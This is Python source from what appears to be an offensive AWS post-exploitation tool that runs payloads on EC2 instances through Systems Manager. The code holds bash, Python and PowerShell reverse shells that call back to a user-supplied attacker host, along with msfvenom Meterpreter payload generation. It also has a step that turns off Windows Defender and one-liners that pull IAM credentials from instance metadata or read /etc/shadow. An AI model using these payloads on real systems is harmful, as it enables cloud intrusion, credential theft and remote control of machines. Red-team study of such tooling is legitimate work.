"""
Go to a menu directly, bypassing the stack. This is used for functionality that involves interaction under a particular menu,
and therefore does not add a menu to the stack.
:param menu: menu to go to directly.
:return: None
"""
if menu == 'main':
main_loop()
elif menu == 'training':
training_loop()
elif menu == 'ec2instances':
instances_loop()
def handle_menu():
"""
Pop the top menu from the stack and go to it.
:return: None
"""
global menu_stack
try:
current_menu = menu_stack.pop()
if current_menu == 'main':
main_loop()
elif current_menu == 'ec2instances':
instances_loop()
elif current_menu == 'training':
training_loop()
else:
main_loop()
except Exception as e:
print(e)
main_loop()
def training_loop():
"""
The menu handler loop for the training menu. Reads commands and sends them to the processor; otherwise shows the menu prompt.
:return: None
"""
try:
command = ''
while command == '':
try:
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(trainingcomplete)
command = raw_input('barq ' +color('training','yellow') + ' > ' )
except Exception as e:
print(e)
#command = prompt.query('aws sheller training > ', validators=[])
command = str(command)
process_training_command(command)
except KeyboardInterrupt as k:
print("CTRL C clicked in training")
menu_backward()
def disable_windows_defender():
"""
The powershell command to disable windows defender.
:return: Returns the powershell command to disable win defender.
"""
return "Set-MpPreference -DisableRealtimeMonitoring $true"
def enable_windows_defender():
"""
Enable Windows Defender Powershell command.
:return: Returns the powershell command to enable win defender again.
"""
return "Set-MpPreference -DisableRealtimeMonitoring $false"
def wait_for_command_invocation(ssmclient, commandid,instanceid):
"""
:param ssmclient: The ssm (Systems manager) client associated with the required region and account.
:param commandid: The id of the command to check invocation results for.
:param instanceid: The id of the instance on which the command was run.
:return: Returns a tuple of success state and AWS response json in full.
"""
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
puts(color('[..] Waiting for command to return.... This will take some time'))
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
puts(color('[!] ERROR: %s'%result['StandardErrorContent']))
return False, result
puts(color('[*] Status of the command is: %s'%result['Status']))
if result['Status'] == 'Success':
puts(color('[+] Success! The command executed successfully. Output is:'))
puts(color(result['StandardOutputContent'],'blue'))
return True, result
def wait_for_threaded_command_invocation( commandid,instanceid, region):
"""
A thread-ready function to wait for invocation for a command on an instance.
TODO: Make it thread-safe by using locks on the global variables.
:param commandid: The command that was run
:param instanceid: The instance on which the command was run.
:param region: The region for Systems Manager
:return: Returns a tuple of success state and AWS response json in full.
"""
global my_aws_creds
logger = logging.getLogger('log')
logger.error('inside wait_for_threaded_command_invocation for %s and commandid: %s' %( instanceid,commandid))
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'],
region_name=region,
aws_session_token=my_aws_creds['aws_session_token'])
ssmclient = mysession.client('ssm', region_name=region)
time.sleep(10)
logger.error('inside wait_for_threaded_command_invocation for %s and commandid: %s, before get_command_invocation a' % (instanceid, commandid))
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
logger.error(
'inside wait_for_threaded_command_invocation for %s and commandid: %s, after get_command_invocation a, status: %s' % (
instanceid, commandid,result['Status']))
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
logger.error(
'failure in wait_for_threaded_command_invocation for %s and commandid: %s, after get_command_invocation b, status: %s' % (
instanceid, commandid, result['Status']))
return False, result
if result['Status'] == 'Success':
logger.error(
'success in wait_for_threaded_command_invocation for %s and commandid: %s, after get_command_invocation b, status: %s' % (
instanceid, commandid, result['Status']))
return True, result
def run_linux_command(ssmclient, instanceid, action, payload):
"""
Run a Systems Manager command on a running Linux instance.
:param ssmclient: Systems Manager client for the required region.
:param instanceid: id of target instance
:param action: Action to be run (AWS calls it DocumentName, here it's running a bash script)
:param payload: The actual payload to be executed on the target instance.
:return: returns status of execution.
"""
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
return success
def run_threaded_linux_command(mysession, target, action, payload):
"""
Thread-enabled function to run a Systems Manager command on a running Linux instance.
TODO: Make it thread-safe by using locks on global variables.
:param mysession: The established boto3 session for the target region
:param target: Target EC2 instance
:param action: Action to be run (AWS calls it DocumentName, here it's running a bash script)
:param payload: The actual payload to be executed on the target instance.
:return: None
"""
global my_aws_creds
global command_invocations
logger = logging.getLogger('log')
logger.error('inside run_threaded_linux_command for %s' %target['id'])
commandid = ''
result = {}
instanceid = target['id']
last_error = ''
try:
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'], region_name=target['region'],
aws_session_token=my_aws_creds['aws_session_token'])
ssmclient = mysession.client('ssm',region_name=target['region'])
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
logger.error('calling run_threaded_linux_command for %s and command: %s' %(target['id'],commandid))
command = {'id':commandid}
command['instanceid'] = instanceid
command['state'] = 'requested'
command['platform'] = 'linux'
command['region'] = target['region']
command_invocations['commands'].append(command)
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
except Exception as e:
logger.error(e)
last_error = str(e)
pass
logger.error('calling run_threaded_linux_command for %s and command: %s ' % (target['id'], commandid))
if 'Status' not in result:
logger.error('run_threaded_linux_command for %s and command: %s failed with error: %s' % (target['id'], commandid, last_error))
return
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
logger.error('run_threaded_linux_command for %s and command: %s failed with error: %s' % (target['id'], commandid, result['StandardErrorContent']))
commandx['state'] = 'failed'
commandx['error'] = result['StandardErrorContent']
command_invocations['commands'][index] = commandx
return False
if result['Status'] == 'Success':
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
logger.error('run_threaded_linux_command for %s and command: %s succeeded with output: %s' % (target['id'], commandid, result['StandardOutputContent']))
commandx['state'] = 'success'
commandx['output'] = result['StandardOutputContent']
command_invocations['commands'][index] = commandx
def run_threaded_windows_command(mysession, target, action, payload, disableav):
"""
Thread-enabled function to run a Systems Manager command on a running Windows instance.
It actually calls three commands: Disable windows defender, run the payload, then enable Windows Defender.
TODO: Make it thread-safe by using locks on global variables.
:param mysession: The established boto3 session for the target region
:param target: Target EC2 instance
:param action: Action to be run (AWS calls it DocumentName, here it's running a powershell script)
:param payload: The actual payload to be executed on the target instance.
:return: None
"""
global my_aws_creds
global command_invocations
logger = logging.getLogger('log')
response = {}
commandid = ''
logger.error("inside run_threaded_windows_command for %s" % target['id'])
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'],
region_name=target['region'],
aws_session_token=my_aws_creds['aws_session_token'])
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'],'ssmclient'))
ssmclient = mysession.client('ssm',region_name=target['region'])
instanceid = target['id']
#stage1 disable windows defender.
if disableav:
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'disable_windows_defender'))
try:
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[disable_windows_defender()]})
commandid = response['Command']['CommandId']
except Exception as e:
logger.error(e)
return False
#############
time.sleep(10)
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'get_command_invocation 1'))
try:
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
except:
pass
#############
success, result = wait_for_threaded_command_invocation(commandid,instanceid, target['region'])
logger.error("inside run_threaded_windows_command for %s, after line: %s" % (target['id'], 'wait_for_threaded_command_invocation 1'))
logger.error("success equals: %s" %success)
if not success:
logger.error('aborting commands for id %s' %target['id'])
return False
#stage2 run payload
time.sleep(3)
logger.error(
"inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'windows payload'))
try:
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
except Exception as e:
logger.error("inside run_threaded_windows_command for instance %s, returning error: %s" %(target['id'],str(e)))
return False
commandid = response['Command']['CommandId']
#################
command = {'id':commandid}
command['instanceid'] = instanceid
command['state'] = 'requested'
command['platform'] = 'windows'
command['region'] = target['region']
command_invocations['commands'].append(command)
time.sleep(10)
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'get_command_invocation 2'))
try:
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
except:
pass
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
logger.error("failure running payload in run_threaded_windows_command for %s, commandid: %s" % (target['id'], commandid))
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
commandx['state'] = 'failed'
commandx['error'] = result['StandardErrorContent']
command_invocations['commands'][index] = commandx
success = False
break
if result['Status'] == 'Success':
logger.error(
"success running payload in run_threaded_windows_command for %s. commandid: %s" % (target['id'], commandid))
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
commandx['state'] = 'success'
commandx['output'] = result['StandardOutputContent']
command_invocations['commands'][index] = commandx
success = True
break
#################
if not success:
logger.error("inside run_threaded_windows_command for %s, failed in running payload" % (target['id']))
#stage3 enable windows defender.
if disableav:
time.sleep(30)
logger.error("inside run_threaded_windows_command for %s, before enable_windows_defender" % (target['id']))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[enable_windows_defender()]})
commandid = response['Command']['CommandId']
success, result = wait_for_threaded_command_invocation(commandid,instanceid,target['region'])
logger.error("inside run_threaded_windows_command for %s, after enable_windows_defender, success: %s" % (target['id'], success))
if not success:
return False
return True
def run_windows_command(ssmclient, instanceid,action,payload, disableav):
"""
Run a Systems Manager command on a running Windows instance.
It actually calls three commands: Disable windows defender, run the payload, then enable Windows Defender.
:param ssmclient: The Systems Manager client for the target region
:param instanceid: Target EC2 instance id
:param action: Action to be run (AWS calls it DocumentName, here it's running a powershell script)
:param payload: The actual payload to be executed on the target instance.
:return: status of execution
"""
time.sleep(3)
#stage1 disable windows defender.
if disableav:
puts(color('[..] Disabling Windows Defender momentarily...'))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[disable_windows_defender()]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
if not success:
puts(color('[!] Could not disable Windows Defender... Stopping command invocation...'))
return False
#stage2 run payload
puts(color('[..] Running payload...'))
time.sleep(3)
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
if not success:
puts(color('[!] Could not run payload... Stopping command invocation...'))
return False
#stage3 enable windows defender.
if disableav:
time.sleep(30)
puts(color('[..] Enabling Windows Defender again....'))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[enable_windows_defender()]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
if not success:
puts(color('[!] Could not enable Windows Defender... Stopping command invocation...'))
return False
return True
PRINT_EC2_METADATA_CMD = "python -c \"import requests, json; b = 'http://169.254.169.254/latest/';m='meta-data/';roleid = requests.get(b+m+'iam/security-credentials/').text; print '{RoleID: %s,'%roleid;print 'Credentials: %s,'%(requests.get(b+m+'iam/security-credentials/%s'%roleid).text); print 'AMIID: %s,'%(requests.get(b+m+'ami-id').text); print 'PublicIP: %s,'%(requests.get(b+m+'public-ipv4').text); print 'PublicHostname:%s,'%(requests.get(b+m+'public-hostname').text); print 'InstanceIdentityDocument: %s,'%(requests.get(b+'dynamic/instance-identity/document').text);print 'UserData:%s}'%(requests.get(b+'user-data/').text);\""
PRINT_EC2_METADATA_PSH = "$b = 'http://169.254.169.254/latest/';$m='meta-data/';$roleid = (Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'iam/security-credentials/')).Content;echo ('--->Role ID: '+$roleid);echo ('--->Credentials: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'iam/security-credentials/'+$roleid)).Content);echo ('--->AMI-ID: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'ami-id')).Content);echo ('--->Public IP: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'public-ipv4')).Content);echo ('--->Public Hostname: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'public-hostname')).Content);echo ('--->Instance Identity Document: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+'dynamic/instance-identity/document')).Content);echo ('--->UserData: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+'user-data/')));"
def choose_training_ami():
"""
Choose the AMI name for the training mode based on the OS choice.
:return: Tuple of OS and AMI name.
"""
puts(color('[*] Choose your EC2 OS:'))
ami_options = [{'selector':'1','prompt':'Linux','return':'linux'},
{'selector':'2','prompt':'Windows','return':'windows'}]
ami = prompt.options('Options:', ami_options)
if ami == 'windows':
return "windows",'Windows_Server-2019-English-Full-Base-2019.01.10'
return "linux",'amzn2-ami-hvm-2.0.20190115-x86_64-gp2'
def shellscript_options(OS):
"""
Prompts command options against an EC2 instance, depending on target OS.
:param OS: Target instance OS.
:return: Tuple of payload and action (AWS SSM DocumentName)
"""
disableav = False
puts(color('[*] Choose your payload:'))
if OS == 'linux':
payload_options = [{'selector':'1','prompt':'cat /etc/passwd','return':'cat /etc/passwd'},
{'selector':'2','prompt':'cat /etc/shadow','return':'cat /etc/shadow'},
{'selector':'3','prompt':'uname -a','return':'uname -a'},
{'selector':'4', 'prompt':'reverse shell to external host', 'return':'reverseshell'},
{'selector':'5','prompt':'whoami','return':'whoami'},
{'selector':'6','prompt':'metasploit','return':'msf'},
{'selector':'7','prompt':'print EC2 metadata and userdata (custom init script)','return':PRINT_EC2_METADATA_CMD},
{'selector':'8','prompt':'Visit a URL from inside EC2 instance','return':'URL'}]
action = 'AWS-RunShellScript'
else:
payload_options = [{'selector':'1','prompt':'ipconfig','return':'ipconfig'},
{'selector':'2', 'prompt':'reverse shell to external host', 'return':'reverseshell'},
{'selector':'3','prompt':'whoami','return':'whoami'},
{'selector':'4','prompt':'metasploit','return':'msf'},
{'selector':'5','prompt':'print EC2 metadata and userdata (custom init script)','return':PRINT_EC2_METADATA_PSH},
{'selector':'6','prompt':'Visit a URL from inside EC2 instance','return':'URL'}]
action = 'AWS-RunPowerShellScript'
payload = prompt.options('Payload:', payload_options)
remote_ip_host = ''
remote_port = ''
if payload == "reverseshell" or payload == "msf":
puts(color('[*] You chose %s option. First provide your remote IP and port to explore shell options.' %payload))
remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:')
remote_port = prompt.query("Your remote port number:", default="4444")
if payload == "reverseshell":
payload, action = reverseshell_options(remote_ip_host, remote_port, OS)
elif payload == "msf":
payload, action = metasploit_installed_options(remote_ip_host, remote_port, OS)
disableav = True
elif payload == 'URL':
puts(color('[*] Choose the URL to visit from inside the EC2 instance:'))
URL = prompt.query('URL: ', default="http://169.254.169.254/latest/")
if OS == 'linux':
payload = "python -c \"import requests; print requests.get('%s').text;\"" %URL
else:
payload = "echo (Invoke-WebRequest -UseBasicParsing -Uri ('%s')).Content;" %URL
return payload,action, disableav
def reverseshell_options(host,port, OS):
"""
Prompts for reverse shell options against an EC2 instance depending on its OS.
:param host: The listening server's IP or hostname
:param port: Port to listen on for shells.
:param OS: OS of that target instance.
:return: Tuple of reverse shell payload and action (AWS SSM DocumentName)
"""
puts(color('[*] Choose your reverse shell type:'))
bash_shell = "bash -i >& /dev/tcp/%s/%s 0>&1" %(host, port)
python_shell = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" %(host, port)
powershell_shell = "$client = New-Object System.Net.Sockets.TCPClient(\"%s\",%s);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" %(host, port)
if OS == "linux":
action = "AWS-RunShellScript"
shell_options = [{'selector':'1','prompt':'Bash reverse shell','return':bash_shell},
{'selector':'2','prompt':'Python reverse shell','return':python_shell},
{'selector':'3','prompt':'Empire Python Launcher','return':'empirepython'}]
else:
action = "AWS-RunPowerShellScript"
shell_options = [{'selector':'1','prompt':'Powershell reverse shell','return':powershell_shell},
{'selector':'2','prompt':'Empire Powershell Launcher','return':'empirepowershell'}]
reverseshell = prompt.options('Payload:', shell_options)
if reverseshell == 'empirepowershell' or reverseshell == 'empirepython':
puts(color('[*] Generate your Empire launcher code in empire and paste it here:'))
reverseshell = raw_input('Paste here:')
return reverseshell, action
def reverseshell_multiple_options( linux, windows):
"""
Prompts for reverse shell options against a range of EC2 instances depending on their OS.
:param linux: Whether or not there are any targeted instances running Linux.
:param windows: Whether or not there are any targeted instances running Windows.
:return: Tuple of reverse shell payloads for linux and windows.
"""
puts(color('[*] Choose your reverse shell type:'))
puts(color('[*] Make sure your listening server can handle multiple simultaneous reverse shell connections:'))
linuxattack = ''
windowsattack = ''
if linux:
linux_options = [{'selector':'1','prompt':'Bash reverse shell','return':'bash'},
{'selector':'2','prompt':'Python reverse shell','return':'python'},
{'selector':'3','prompt':'Empire Python Launcher','return':'empirepython'}]
linuxattack = prompt.options('Payload for Linux EC2 instances:', linux_options)
if linuxattack == 'empirepython':
puts(color('[*] Generate your Empire python launcher code in empire and paste it here:'))
linuxattack = raw_input('Paste here:')
else:
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number:", default="4444")
if linuxattack == 'bash':
linuxattack = "bash -i >& /dev/tcp/%s/%s 0>&1" %(host, port)
elif linuxattack == 'python':
linuxattack = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" %(host, port)
if windows:
windows_options = [{'selector':'1','prompt':'Powershell reverse shell','return':'powershell'},
{'selector':'2','prompt':'Empire Powershell Launcher','return':'empirepowershell'}]
windowsattack = prompt.options('Payload for Windows EC2 instances:', windows_options)
if windowsattack == 'empirepowershell':
puts(color('[*] Generate your Empire powershell launcher code in empire and paste it here:'))
windowsattack = raw_input('Paste here:')
else:
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number:", default="5555")
if windowsattack == 'powershell':
windowsattack = "$client = New-Object System.Net.Sockets.TCPClient(\"%s\",%s);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" %(host, port)
return linuxattack,windowsattack
def metasploit_not_installed_options(host, port, OS):
"""
Options in case Metasploit is not locally installed on the attacking system.
TODO: Implement this
:param host: The listening server's IP or hostname
:param port: Port to listen on for shells.
:param OS: OS of that target instance.
:return: Nothing
"""
pass
def metasploit_installed_multiple_options( linux, windows):
"""
Prompts for metasploit options against a range of EC2 instances depending on their OS.
:param linux: Whether or not there are any targeted instances running Linux.
:param windows: Whether or not there are any targeted instances running Windows.
:return: Tuple of metasploit payloads for linux and windows.
"""
puts(color('[*] Choose your metasploit payload. This requires msfvenom to be installed in your system.'))
linux_tcp_meterpreterx64 = 'python/meterpreter/reverse_tcp'
linux_https_meterpreterx64 = 'python/meterpreter/reverse_https'
linux_tcp_shell = 'python/shell_reverse_tcp'
windows_tcp_meterpreterx64 = 'windows/x64/meterpreter/reverse_tcp'
windows_https_meterpreterx64 = 'windows/x64/meterpreter/reverse_https'
windows_tcp_shell = 'windows/x64/shell/reverse_tcp'
linuxattack = ''
windowsattack = ''
#remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:')
#remote_port = prompt.query("Your remote port number:", default="4444")
if linux:
linux_options = [{'selector':'1','prompt':'Linux Meterpreter reverse TCP x64','return':linux_tcp_meterpreterx64},
{'selector':'2','prompt':'Linux Meterpreter reverse HTTPS x64','return':linux_https_meterpreterx64},
{'selector':'3','prompt':'Linux TCP Shell','return':linux_tcp_shell}]
linuxpayload = prompt.options('Payload for Linux EC2 instances:', linux_options)
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number (Listener ports should be different for linux and windows):", default="4444")
linuxmsfshell = 'msfvenom -a python --platform python -p %s LHOST=%s LPORT=%s -f raw --smallest' %(linuxpayload,host, port)
puts(color('[*] Run the following command on your remote listening server to run the linux payload handler:'))
msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" %(host, port, linuxpayload)
puts(colored.magenta(msfconsole_cmd))
linuxattack = os.popen(linuxmsfshell).read()
linuxattack = "python -c \"%s\"" %linuxattack
if windows:
windows_options = [{'selector':'1','prompt':'Windows Meterpreter reverse TCP x64','return':windows_tcp_meterpreterx64},
{'selector':'2','prompt':'Windows Meterpreter reverse HTTPS x64','return':windows_https_meterpreterx64},
{'selector':'3','prompt':'Windows TCP Shell','return':windows_tcp_shell}]
windowspayload = prompt.options('Payload for Windows EC2 instances:', windows_options)
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number (Listener ports should be different for linux and windows):", default="5555")
windowsmsfshell = 'msfvenom -a x64 --platform Windows -p %s LHOST=%s LPORT=%s --f psh-net --smallest' %(windowspayload, host, port)
puts(color('[*] Run the following command on your remote listening server to run the windows payload handler:'))
msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" %(host, port, windowspayload)
puts(colored.magenta(msfconsole_cmd))
windowsattack = os.popen(windowsmsfshell).read()
return linuxattack, windowsattack
def metasploit_installed_options(host, port, OS):
"""
Prompts for metasploit options against an EC2 instance depending on its OS.
:param host: IP or hostname of the listening server running metasploit exploit handler.
:param port: The port the exploit handler is listening on.
:param OS: The OS of the target instance
:return: Tuple of reverse shell payloads for linux and windows.
"""
puts(color('[*] Choose your metasploit payload. This requires msfvenom to be installed in your system.'))
#output = os.popen("msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f psh --smallest").read()
linux_tcp_meterpreterx64 = 'python/meterpreter/reverse_tcp'
linux_https_meterpreterx64 = 'python/meterpreter/reverse_https'
linux_tcp_shell = 'python/shell_reverse_tcp'
windows_tcp_meterpreterx64 = 'windows/x64/meterpreter/reverse_tcp'
windows_https_meterpreterx64 = 'windows/x64/meterpreter/reverse_https'
windows_tcp_shell = 'windows/x64/shell/reverse_tcp'
if OS == 'linux':
action = 'AWS-RunShellScript'
shell_options = [{'selector':'1','prompt':'Linux Meterpreter reverse TCP x64','return':linux_tcp_meterpreterx64},
{'selector':'2','prompt':'Linux Meterpreter reverse HTTPS x64','return':linux_https_meterpreterx64},
{'selector':'3','prompt':'Linux TCP Shell','return':linux_tcp_shell}]
else:
action = 'AWS-RunPowerShellScript'
shell_options = [{'selector':'1','prompt':'Windows Meterpreter reverse TCP x64','return':windows_tcp_meterpreterx64},{'selector':'2','prompt':'Windows Meterpreter reverse HTTPS x64','return':windows_https_meterpreterx64},
{'selector':'3','prompt':'Windows TCP Shell','return':windows_tcp_shell}]
payload = prompt.options('Payload:', shell_options)
if OS == 'linux':
msfshell = 'msfvenom -p %s LHOST=%s LPORT=%s -f raw --smallest' %(payload,host, port)
else:
msfshell = 'msfvenom -p %s LHOST=%s LPORT=%s --f psh-net --smallest' %(payload, host, port)
puts(color('[*] Run the following command on your reverse server running the handler:'))
msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" %(host, port, payload)
puts(colored.magenta(msfconsole_cmd))
shellcode = os.popen(msfshell).read()
if OS == 'linux':
shellcode = "python -c \"%s\"" %shellcode
return shellcode, action
def start_training_mode(caller):
"""
Start the training mode.
:param caller: menu that called this function
:return: None
"""
global my_aws_creds
mysession = ''
try:
mysession = my_aws_creds['session']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
ec2resource = mysession.resource('ec2')
iamresource = mysession.resource('iam')
ssmclient = mysession.client('ssm')
iamclient = mysession.client('iam')
ec2client = mysession.client('ec2')
with indent(6, quote=">>>>"):
puts(color('[*] Training mode entered'))
puts(color('[..] preparing environment....'))
AssumeRolePolicydata = {'Version': '2012-10-17','Statement': {'Effect': 'Allow','Principal': {'Service': 'ec2.amazonaws.com'},'Action': 'sts:AssumeRole'}}
puts(color('[..] Creating Assume Role Policy...'))
rolename = 'role'+ id_generator()
puts(color('[..] Creating role with name: %s'%rolename))
role = iamresource.create_role(RoleName=rolename,AssumeRolePolicyDocument=json.dumps(AssumeRolePolicydata))
puts(color("[+] Role created successfully."))
puts(color('[..] Attaching needed policies for role...'))
responseforrole = iamclient.attach_role_policy(RoleName=role.name, PolicyArn='arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM')
puts(color('[+] Role attached successfully to policy AmazonEC2RoleforSSM'))
puts(color('[..] Creating EC2 instance profile and adding it to role...'))
instance_profile = iamresource.create_instance_profile(InstanceProfileName=role.name)
instance_profile.add_role(RoleName=role.name)
OS,amznlnxaminame = choose_training_ami()
puts(color('[+] OS chosen is: %s'%OS))
#"amzn2-ami-hvm-2.0.20190115-x86_64-gp2" #"amzn-ami-hvm-2018.03.0.20180811-x86_64-ebs"
puts(color('[+] Amazon AMI used is: %s'%amznlnxaminame))
ami_images = list(ec2resource.images.filter(Filters=[{'Name':'name','Values':[amznlnxaminame,]}]))
amznamiid = ami_images[0].image_id
puts(color('[..] Now creating EC2 instance of type t2.micro with this AMI....'))
time.sleep(10)
newinstances = ec2resource.create_instances(ImageId=amznamiid, InstanceType='t2.micro',MinCount=1,MaxCount=1, IamInstanceProfile={'Name':role.name})
newinstance = newinstances[0]
puts(color('[+] EC2 instance id is: %s'%newinstance.id))
puts(color('[..] Waiting for EC2 instance to complete running..... This will take a while'))
newinstance.wait_until_running()
newinstance.reload()
puts(color('[+] EC2 instance state is: %s'%newinstance.state))
payload,action, disableav = shellscript_options(OS)
puts(color('[..] Sending the command "%s" to the running instance....'%payload))
instanceid = newinstance.id
time.sleep(10)
if OS == 'linux':
success = run_linux_command(ssmclient,instanceid,action,payload)
else:
puts(color('[..] Waiting for Windows EC2 instance to be ready... waiting for 2 minutes...'))
time.sleep(120)
success = run_windows_command(ssmclient,instanceid, action, payload, disableav)
#########
#########
puts(color('[+] Training mode done... Now terminating EC2 instance and deleting IAM role...'))
newinstance.terminate()
puts(color('[..] Waiting for instance to be terminated...'))
newinstance.wait_until_terminated()
puts(color('[+] EC2 instance terminated. Now detaching policy and deleting role...'))
instance_profile.remove_role(RoleName=role.name)
instance_profile.delete()
role.detach_policy(PolicyArn='arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM')
role.delete()
puts(color('[+] Done!'))
go_to_menu(caller)
def process_training_command(command):
"""
Process command in the training menu.
:param command: The command to process.
:return: None
"""
global menu_stack
if command == 'help':
training_help()
elif command == 'where':
puts(colored.green("You are in training menu"))
elif command == 'setprofile':
set_aws_creds('training')
elif command == 'start':
start_training_mode('training')
elif command == 'back':
#handle_menu()
menu_backward()
elif command == 'showprofile':
show_aws_creds('training')
elif command == 'exit':
exit()
training_loop()
""" pass
elif command == 'setprofile':
set_aws_creds('main')
elif command == 'showprofile':
show_aws_creds('main')
elif command == 'dumpsecrets':
find_all_creds('main')
elif command == 'attacksurface':
find_attacksurface('main')
"""
global INSTANCESIDCOMMANDS
INSTANCESIDCOMMANDS = []
def instanceidcomplete(text, state):
"""
Auto complete for Instance ID table.
"""
global INSTANCESIDCOMMANDS
